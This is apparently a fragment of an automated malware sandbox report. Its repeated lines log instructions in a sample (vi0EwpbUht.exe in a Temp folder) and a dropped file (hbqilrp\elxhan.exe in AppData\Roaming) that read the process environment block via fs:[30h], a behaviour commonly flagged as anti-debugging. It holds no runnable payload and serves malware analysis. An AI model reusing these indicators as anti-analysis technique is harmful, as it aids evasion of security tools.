          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A98CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A4A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A98D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A03D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A43540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A73D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A08EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 6_2_0019F55F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 6_2_0019F29A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A420A0 mov eax, dword ptr fs:[00000030h]
